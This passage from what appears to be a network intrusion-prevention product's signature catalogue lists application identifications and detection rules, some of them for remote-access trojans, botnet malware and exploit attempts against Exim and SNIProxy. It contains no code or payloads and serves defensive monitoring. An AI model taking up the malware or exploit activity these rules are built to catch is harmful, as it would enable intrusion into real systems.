Description: ThunderMaps makes software targeted towards improving, health and safety in organisations, and communication tools for governments and organisations.
Back to top

ThunderTix

About this situation: Application ThunderTix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ThunderTix is an online ticketing and event management software for small to medium-sized venues. ThunderTix is a software as a Service
Back to top

Thwapr

About this situation: Thwapr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A mobile video-sharing service
Back to top

Tibco

About this situation: Application Tibco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TIBCO provides message queue software for companies to use on-premises or as part of cloud computing environments. The software manages information, decisions, processes and applications.
Back to top

Tibia

About this situation: Tibia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Tick

About this situation: Application Tick detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tick is the time tracking software for projects teams. It makes it by providing time budget tracking features built into the time entry system.
Back to top

Ticketsolve

About this situation: Application Ticketsolve detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ticketsolve help you create manage ticket sales from your desktop. Ticketing system suits all types of events.
Back to top

TicketSource

About this situation: Application TicketSource detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TicketSource is online ticketing system for any type of venue or event helping you sell tickets online using web based box office.
Back to top

Tictrac

About this situation: Application Tictrac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tictrac is a Digital Health Platform that synchronizes with all other available third party platforms to offer data and analytics about the activities of the user.
Back to top

Tidaltv

About this situation: tidaltv usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: TidalTV is an online video advertising network; source TidalTV
Back to top

TIE-Kinetix

About this situation: Application TIE-Kinetix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TIE Kinetix transforms the digital supply chain by providing e-commerce solutions.
Back to top

TierraNet

About this situation: Application TierraNet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TierraNet is a full service domain registrar, web host and web security product provider.
Back to top

Tietoviikko

About this situation: Tietoviikko usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-628-5211
Description: Tietoviikko is a Finnish technology oriented newspaper.
Back to top

TigerConnect

About this situation: Application TigerConnect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: TigerText's apps for medical professionals and healthcare communication systems. Improve patient safety, satisfaction and service quality
Back to top

TikTok

About this situation: TikTok video sharing traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1761-5242
Description: TikTok, also known as Douyin, is a mobile media application for creating and sharing short video content.
Back to top

time-cockpit

About this situation: Application time-cockpit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Time cockpit - time tracking software.
Back to top

Time-Doctor

About this situation: Application Time-Doctor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Time Doctor is an employee time tracking software that helps you and your team get a more done each day.
Back to top

Time-Off-Manager

About this situation: Application Time-Off-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeOffManager.com is a fully automated online service for companies to track and manage their employees' paid time-off, vacation, sick days or any other custom time-off.
Back to top

Time-Tracker

About this situation: Application Time-Tracker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeTracker - scheduling software allows you to automate and analyze staff schedules.
Back to top

Time-Warner-Cable-Personal

About this situation: Application Time-Warner-Cable-Personal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Time Warner Cable provides cable television, high speed Internet and telephone service that connects more than 15 million customers in the United States to entertainment, information and each other.
Back to top

Timebridge

About this situation: Timebridge usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: TimeBridge is a Web-based software application for coordinating and running meetings and collaborating online. TimeBridge's meeting management service works with large groups or one-on-one meetings across time zones and companies and integrates directly with Microsoft Outlook, Google Calendar and Apple iCal.
Back to top

TimeCamp

About this situation: Application TimeCamp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeCamp is a online software for time tracking that supports track time on projects and tasks using accurate time tracking method.
Back to top

TimeCentre-Enterprise

About this situation: Application TimeCentre-Enterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeCentre
Back to top

TimeClock-Plus

About this situation: Application TimeClock-Plus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeClock Plus develops time and attendance solutions for employee labor tracking.
Back to top

TimeDock

About this situation: Application TimeDock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeDock is an intuitive swipe-card mobile time and attendance system for field-based organisations.
Back to top

TimeForce

About this situation: Application TimeForce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeForce is a cloud-based time and attendance system. It helps collect, manage and process employee time.
Back to top

TimeForge-Labor-Management-Software

About this situation: Application TimeForge-Labor-Management-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeForge Labor Management software handles employee scheduling, time tracking, payroll exports, human resources, a daily log, sales-to-labor tools.
Back to top

TimeHighway

About this situation: Application TimeHighway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeHighway offers cutting-edge technology for online service appointments, as well as outstanding service drive management and shop loading for the service department.
Back to top

TimeLog

About this situation: Application TimeLog detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeLog develops and delivers a SaaS solution for time tracking, project Managent and invoicing.
Back to top

Timely

About this situation: Application Timely detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Timely is a provider of time tracking and project control software for productive teams.
Back to top

Timesheet-Mobile

About this situation: Application Timesheet-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Timesheet Mobile's timesheet app with GPS geofencing accurately tracks hours and locations of mobile employees using any phone from any job location.
Back to top

Timesheet.com-(Tenrox-Time-Tracking)

About this situation: Application Timesheet.com-(Tenrox-Time-Tracking) detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Timesheet.com is a cloud, workflow-driven time tracking solution.
Back to top

Timesheets.com

About this situation: Application Timesheets.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Web-based time tracking for payroll and time-off as well as project time tracking for billing or job costing. Mobile time and expense tracking is also available.
Back to top

TimeSolv

About this situation: Application TimeSolv detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeSolv is a a billing software that providing user-friendly invoicing, time tracking, and project management functionality.
Back to top

Timetoast

About this situation: Application Timetoast detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Timetoast is a place to create timelines that you can add to your blog or website.
Back to top

Timetonote

About this situation: Timetonote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-636-5211
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

TimeTrade

About this situation: Application TimeTrade detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimeTrade Systems provides customer, self-service appointment scheduling solutions for enterprises and individuals. TimeTrade's solutions were designed with a rules-based technology and built on standards including Service-Oriented Architecture
Back to top

TimeXchange

About this situation: Application TimeXchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Making time reporting and approving easy and inexpensive for everyone involved including workers, admins, managers and clients.
Back to top

TimingCube

About this situation: Application TimingCube detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TimingCube provides investment system that tells investors when to buy and sell stock market ETFs.
Back to top

Tinder

About this situation: Tinder usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: Tinder usage detected. Tinder is a social media service for meeting new people.
Back to top

TinderBox

About this situation: Application TinderBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TinderBox provides online proposal management software that leverages data in your CRM to automatically generate dynamic sales documents
Back to top

TinEye

About this situation: TinEye Reverse Image Search usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-628-5211
Description: TinEye is a reverse image search engine.
Back to top

Tinfoil-Security

About this situation: Application Tinfoil-Security detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tinfoil Security provides a website application security solution by routinely monitoring and checking for vulnerabilities using a constantly updated scanner.
Back to top

Tinypic

About this situation: TinyPic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

TINYpulse

About this situation: Application TINYpulse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TINYpulse is an employee engagement platform that offers pulse surveys, peer recognition, and performance reviews to boost retention and your bottom line.
Back to top

TinyWebGallery

About this situation: TinyWebGallery usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Description: TinyWebGallery usage was detected. TinyWebGallery is an image gallery service.
Back to top

Tipalti

About this situation: Application Tipalti detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tipalti is a supplier payments automation solution to streamline all phases of the AP and payment management workflow in one holistic cloud platform.
Back to top

Tissue-Trackcore-by-LPIT-Solutions

About this situation: Application Tissue-Trackcore-by-LPIT-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: LPITSolutions is resource for business technology solutions and support. TrackCore is software for health care and designed to help facilities meet and exceed The Joint Commission's
Back to top

TissueApp

About this situation: Application TissueApp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TissueApp is a web application designed to help you synchronize your Zendesk tickets and your GitHub issues.
Back to top

Tistory

About this situation: Tistory usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Tistory is blog hosting services with strategic partnership between Tattertools, a famous blog software written PHP and Daum Comminications, the largest internet portal in Korea.
Back to top

Titanfile.com

About this situation: Application Titanfile.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TitanFile is a secure way for professionals to communicate without having to worry about security and privacy. TitanFile automatically organizes messages and documents around clients, groups or projects, reducing filing overhead and increasing productivity.
Back to top

TLS

About this situation: Transport Layer Security (TLS) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1629-5242
Description: The Transport Layer Security (TLS) is a cryptographic protocol which provide secure communications on the Internet for web browsing, e-mail, Internet faxing, and other data transfers.
Back to top

TLS connection state

About this situation: Debugging TLS state
Context: TLS without parameters
Severity: 1
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Situation to monitor TLS connection state
Back to top

TLS Match Stop Condition

About this situation: TLS Match Stop Condition
Context: Local Correlation
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1278-5242
Last changed: sgpkg-ips-1286-5242
Description: TLS Match Stop Condition for use with Network Applications.
Back to top

TLS-1.0

About this situation: Transport Layer Security (TLS) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1629-5242
Description: Transport Layer Security (TLS) version 1.0 usage. TLS 1.0 is defined in RFC 2246.
Back to top

TLS-1.0-Other

About this situation: TLS 1.0 tunnel with non-web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.0 tunnel with non-web traffic inside was seen. The TLS handshake has either indicated that the protocol inside the tunnel is not HTTP, or it did not indicate the protocol at all. This application can be used for controlling all non-web based TLS traffic that uses TLS version 1.0.TLS 1.0 has been deprecated in 2021 by RFC 8996. The recommended action is to terminate the traffic.
Back to top

TLS-1.0-Web

About this situation: TLS 1.0 tunnel with web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.0 tunnel with web traffic inside was seen. The TLS handshake has indicated that the protocol inside the tunnel is either HTTP/1.1 or HTTP/2. This application can be used for controlling all web based TLS traffic that uses TLS version 1.0.TLS 1.0 has been deprecated in 2021 by RFC 8996. The recommended action is to terminate the traffic.
Back to top

TLS-1.1

About this situation: Transport Layer Security (TLS) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1629-5242
Description: Transport Layer Security (TLS) version 1.1 usage. TLS 1.1 is defined in RFC 4346.
Back to top

TLS-1.1-Other

About this situation: TLS 1.1 tunnel with non-web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.1 tunnel with non-web traffic inside was seen. The TLS handshake has either indicated that the protocol inside the tunnel is not HTTP, or it did not indicate the protocol at all. This application can be used for controlling all non-web based TLS traffic that uses TLS version 1.1.TLS 1.1 has been deprecated in 2021 by RFC 8996. The recommended action is to terminate the traffic.
Back to top

TLS-1.1-Web

About this situation: TLS 1.1 tunnel with web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.1 tunnel with web traffic inside was seen. The TLS handshake has indicated that the protocol inside the tunnel is either HTTP/1.1 or HTTP/2. This application can be used for controlling all web based TLS traffic that uses TLS version 1.1.TLS 1.1 has been deprecated in 2021 by RFC 8996. The recommended action is to terminate the traffic.
Back to top

TLS-1.2

About this situation: Transport Layer Security (TLS) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1629-5242
Description: Transport Layer Security (TLS) version 1.2 usage. TLS 1.2 is defined in RFC 4346.
Back to top

TLS-1.2-Other

About this situation: TLS 1.2 tunnel with non-web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.2 tunnel with non-web traffic inside was seen. The TLS handshake has either indicated that the protocol inside the tunnel is not HTTP, or it did not indicate the protocol at all. This application can be used for controlling all non-web based TLS traffic that uses TLS version 1.2.
Back to top

TLS-1.2-Web

About this situation: TLS 1.2 tunnel with web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.2 tunnel with web traffic inside was seen. The TLS handshake has indicated that the protocol inside the tunnel is either HTTP/1.1 or HTTP/2. This application can be used for controlling all web based TLS traffic that uses TLS version 1.2.
Back to top

TLS-1.3

About this situation: Transport Layer Security (TLS) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1629-5242
Description: Transport Layer Security (TLS) version 1.3 usage. TLS 1.3 is defined in RFC 8446.
Back to top

TLS-1.3-Other

About this situation: TLS 1.3 tunnel with non-web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.3 tunnel with non-web traffic inside was seen. The TLS handshake has either indicated that the protocol inside the tunnel is not HTTP, or it did not indicate the protocol at all. This application can be used for controlling all non-web based TLS traffic that uses TLS version 1.3.
Back to top

TLS-1.3-Web

About this situation: TLS 1.3 tunnel with web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS 1.3 tunnel with web traffic inside was seen. The TLS handshake has indicated that the protocol inside the tunnel is either HTTP/1.1 or HTTP/2. This application can be used for controlling all web based TLS traffic that uses TLS version 1.3.
Back to top

TLS-JA3_Apple-IOS-Or-MacOS

About this situation: A TLS Client using an Apple operating system detected by a JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: This element contains JA3 checksums which match the TLS handshake of software on Apple operating systems
Back to top

TLS-JA3_Apt

About this situation: Apt based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: This element contains JA3 checksums which match to the TLS library of Apt
Back to top

TLS-JA3_Chrome

About this situation: Chrome Browser based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: This element contains JA3 checksums which match to the TLS library of Chrome
Back to top

TLS-JA3_Curl

About this situation: Curl based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: This element contains JA3 checksums which match to the TLS library of Curl
Back to top

TLS-JA3_DNS_Over_TLS

About this situation: DNS over TLS identification based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Description: This element contains JA3 checksums which match to the TLS library of DNS over TLS
Back to top

TLS-JA3_Emotet

About this situation: Emotet identification based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Potential Botnet
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Description: This element contains JA3 checksums which match to the TLS library of Emotet. Some legitimate TLS libraries have also been observed to produce the same checksum, so false positives may occur.
Back to top

TLS-JA3_Firefox

About this situation: Firefox Browser based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: This element contains JA3 checksums which match to the TLS library of Firefox
Back to top

TLS-JA3_Google-Applications

About this situation: Google client application detection based on the TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Description: This element contains JA3 checksums which match Google client applications
Back to top

TLS-JA3_Hotspot-Shield

About this situation: Hotspot Shield VPN identification based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1136-5242
Description: This element contains JA3 checksums which match to the TLS library of Hotspot Shield VPN
Back to top

TLS-JA3_Play-Store

About this situation: Google Play Store client based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: This element contains JA3 checksums which match the Google Play Store client
Back to top

TLS-JA3_RevCode-RAT

About this situation: RevCode RAT based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Spyware, Malware and Adware
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Description: This element contains JA3 checksums which match to the TLS library of RevCode RAT
Back to top

TLS-JA3_Shoora_VPN

About this situation: Shoora VPN based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Description: This element contains JA3 checksums which match to the TLS library of Shoora VPN
Back to top

TLS-JA3_Steam

About this situation: Steam based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Description: This element contains JA3 checksums which match to the TLS library of Steam
Back to top

TLS-JA3_TOR

About this situation: TOR identification based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Description: This element contains JA3 checksums which match to the TLS library of the standard TOR client.
Back to top

TLS-JA3_TrickBot

About this situation: Trickbot malware identification based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Suspected Botnet
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Description: This element contains JA3 checksums which match to the TLS library of Trickbot Malware
Back to top

TLS-JA3_Troldesh-Malware

About this situation: Troldesh malware based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Spyware, Malware and Adware
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description: This element contains JA3 checksums which match to the TLS library of Troldesh malware.
Back to top

TLS-JA3_Ultrasurf

About this situation: Ultrasurf identification based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1149-5242
Description: This element contains JA3 checksums which match to the TLS library of Ultrasurf
Back to top

TLS-JA3_Wget

About this situation: Wget based on TLS Client JA3 fingerprint
Context: TLS Client Hello JA3 Hash
Severity: 1
Tags: Browsers
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: This element contains JA3 checksums which match to the TLS library of Wget
Back to top

TLS-Other

About this situation: TLS tunnel with non-web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
Description: A TLS tunnel with non-web traffic inside was seen. The TLS handshake has either indicated that the protocol inside the tunnel is not HTTP, or it did not indicate the protocol at all. This application can be used for controlling all non-web based TLS traffic.
Back to top

TLS-SNI_Exim-Remote-Code-Execution-CVE-2019-15846

About this situation: An attempt to exploit a vulnerability in Exim detected
Context: TLS SNI Stream
Severity: 7
Tags: Linux, Any Hardware, Exim, CVE2019, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1186-5242
Last changed: sgpkg-ips-1186-5242
Vulnerability: Exim-Remote-Code-Execution-CVE-2019-15846
Description:
Back to top

TLS-SNI_IP-Address-In-SNI

About this situation: A SNI value which is an IP address was detected
Context: TLS SNI Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1218-5242
Description:
Back to top

TLS-SNI_Orcus-RAT-Infection-Traffic

About this situation: Orcus RAT infection traffic was detected
Context: TLS SNI Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Vulnerability: Orcus-RAT-Infection-Traffic
Description:
Back to top

TLS-SNI_SNIProxy-New_address-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SNIProxy detected
Context: TLS SNI Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SNIProxy, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Vulnerability: SNIProxy-New_address-Stack-Buffer-Overflow
Description:
Back to top

TLS-SNI_Snowflake-Proxy

About this situation: Use of Snowflake Proxy detected.
Context: TLS SNI Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: TOR-Network-Usage
Description:
Back to top

TLS-SNI_Suspicious-Server-Name-Indication

About this situation: Probable tunneling over TLS, such as TOR
Context: TLS SNI Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: TOR-Network-Usage
Suspicious-Server-Name-Indication
Description:
Back to top

TLS-SNI_Your-Freedom-Network-Query

About this situation: Detected an attempt to connect to a Your Freedom host
Context: TLS SNI Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

TLS-SPDY

About this situation: SPDY traffic over TLS
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1629-5242
Description: SPDY is a replacement for HTTP protocol introduced by Google.
Back to top

TLS-Web

About this situation: TLS tunnel with web traffic inside seen
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1727-5242
Last changed: sgpkg-ips-1727-5242
